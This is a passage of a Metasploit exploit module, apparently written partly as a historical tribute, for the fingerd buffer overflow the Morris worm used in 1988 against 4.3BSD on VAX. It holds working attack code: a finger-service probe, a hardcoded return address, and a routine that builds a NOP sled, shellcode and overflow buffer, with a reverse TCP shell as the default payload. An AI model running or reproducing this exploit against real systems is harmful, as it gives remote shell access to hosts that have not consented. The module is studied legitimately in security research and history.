This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
},
'Author' => [
'Robert Tappan Morris', # Discovery? Exploit and worm for sure
'Cliff Stoll', # The Cuckoo's Egg epilogue and inspiration
'wvu' # Module, payload, and additional research
],
'References' => [
['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History
['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'], # Analysis
['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'], # Details
['URL', 'https://github.com/arialdomartini/morris-worm'], # Source
['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
# And credit to the innumerable VAX ISA docs on the Web
],
'DisclosureDate' => 'Nov 2 1988',
'License' => MSF_LICENSE,
'Platform' => 'bsd',
'Arch' => ARCH_VAX,
'Privileged' => false, # Depends on inetd.conf, usually "nobody"
'Targets' => [
# https://en.wikipedia.org/wiki/Source_Code_Control_System
['@(#)fingerd.c 5.1 (Berkeley) 6/6/85',
'Ret' => 0x7fffe9b0,
'Payload' => {
'Space' => 403,
'BadChars' => "\n",
'Encoder' => 'generic/none', # There is no spoon
'DisableNops' => true # Hardcoded NOPs
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'}
))
register_options([Opt::RPORT(79)])
end
def check
token = rand_text_alphanumeric(8..42)
connect
sock.put("#{token}\n")
res = sock.get_once
return CheckCode::Unknown unless res
if res.include?("Login name: #{token}")
return CheckCode::Detected
end
CheckCode::Safe
rescue Rex::ConnectionError => e
vprint_error(e.message)
CheckCode::Unknown
ensure
disconnect
end
def exploit
# Start by generating our custom VAX shellcode
shellcode = payload.encoded
# 0x01 is NOP in VAX-speak
nops = "\x01" * (target.payload_space - shellcode.length)
# This overwrites part of the buffer
junk = rand_text_alphanumeric(109)
# This zeroes out part of the stack frame
frame = "\x00" * 16
# Finally, pack in our return address
ret = [target.ret].pack('V') # V is for VAX!
# The newline is for gets(3)
sploit = nops + shellcode + junk + frame + ret + "\n"
# Fire away
print_status('Connecting to fingerd')
connect
print_status("Sending #{sploit.length}-byte buffer")
sock.put(sploit)
# Hat tip @bcoles
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
ensure
disconnect
end
end